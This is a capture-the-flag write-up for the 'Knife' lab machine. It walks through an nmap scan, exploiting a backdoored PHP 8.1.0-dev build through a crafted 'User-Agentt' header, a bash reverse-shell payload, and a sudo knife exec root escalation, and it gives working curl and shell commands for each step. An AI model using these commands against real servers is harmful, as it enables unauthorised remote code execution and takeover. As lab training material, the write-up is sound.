Knife

About the machine

Knife is an easy machine involving a PHP backdoored version which allowed me to get access on the system, for the privilege escalation I could run a binary with root permission.

Recon

nmap

Running a simple nmap scan reveals just two ports open, OpenSSH running on port 22 and Apache on port 80.

# Nmap 7.91 scan initiated Sun Aug 22 22:34:41 2021 as: nmap -v -sC -sV -oN nmap/knife 10.10.10.242
Nmap scan report for 10.10.10.242
Host is up (0.55s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Based on SSH and Apache banners the host is likely to be running Ubuntu Focal Fossa (20.04).

HTTP

At a first glance accessing the page I thought this would be something related to an Electronic Medical Records system.

After some time analyzing and fuzzing the page and not finding anything interesting I looked into the headers to see if I would find anything useful.

The thing that caught my attention was the PHP version (8.1.0-dev), googling it brought me to a news about a backdoored version of PHP:

https://news-web.php.net/php.internals/113838

Here is the malicious code committed to the repository:

https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a

Basically what is doing it is checking the presence of the HTTP header User-Agentt with double t, if it is present and the content starts with zerodium it will evaluate the rest of the statement. So, if it is passed something like zerodiumsystem('id'); it will evaluate to system('id'); .

User

RCE

Just using curl we can test if it is vulnerable or not.

curl -s http://10.10.10.242/ -H "User-Agentt: zerodiumsystem('id');" | head -n 1

Confirming that in fact it is vulnerable we can try to get a reverse shell.

curl -s http://10.10.10.242/ -H "User-Agentt: zerodiumsystem('/bin/bash -c \'bash -i >& /dev/tcp/IP/PORT 0>&1\'');"

Root

Enumeration

After getting a shell and running sudo -l I see I can run /usr/bin/knife as root with no password.

Searching for what it is I found it is part of Chef, a platform for DevOps automation.

knife is a command-line tool that provides an interface between a local chef-repo and the Chef Infra Server.

With knife we can do a lot of things including run Ruby scripts with knife exec .

Running the following command I got a shell as root:

sudo /usr/bin/knife exec -E 'exec "/bin/bash"'